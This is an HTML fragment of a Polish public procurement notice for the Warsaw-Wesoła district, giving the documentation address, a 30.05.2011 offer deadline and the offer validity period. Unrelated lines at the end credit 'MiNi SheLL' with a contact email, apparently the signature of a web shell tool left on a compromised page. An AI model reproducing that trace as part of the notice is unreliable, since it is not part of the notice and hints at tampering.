<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wesola.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miasto Stołeczne Warszawa,
Dzielnica Wesoła  
ul. 1. Praskiego Pułku 33, 
05-075 Warszawa-Wesoła
pok. 210.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2011 godzina 10:00, miejsce: Urząd m.st. Warszawy dla Dzielnicy Wesoła, ul. 1. Praskiego Pułku nr 33, 
05-075 Warszawa-Wesoła,  Wydział Obsługi Mieszkańców (parter), pok. Nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com